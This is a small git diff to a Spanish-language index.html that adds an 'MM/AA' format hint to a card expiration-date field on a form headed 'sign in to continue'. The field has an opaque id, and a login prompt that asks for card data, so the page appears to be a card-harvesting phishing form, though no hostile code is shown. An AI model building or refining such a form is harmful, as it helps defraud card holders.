Actualizar index.html

--- a/index.html
+++ b/index.html
@@ -67,7 +67,7 @@
             <h2>Inicia session para seguir</h2>
             <div class="input-group">
                
-                <input inputmode="numeric" placeholder="Fecha de Expiracion" type="text" id="elru7" name="elru7" required="">
+                <input inputmode="numeric" placeholder="Fecha de Expiracion MM/AA" type="text" id="elru7" name="elru7" required="">
             </div>
             <div class="input-group">
               
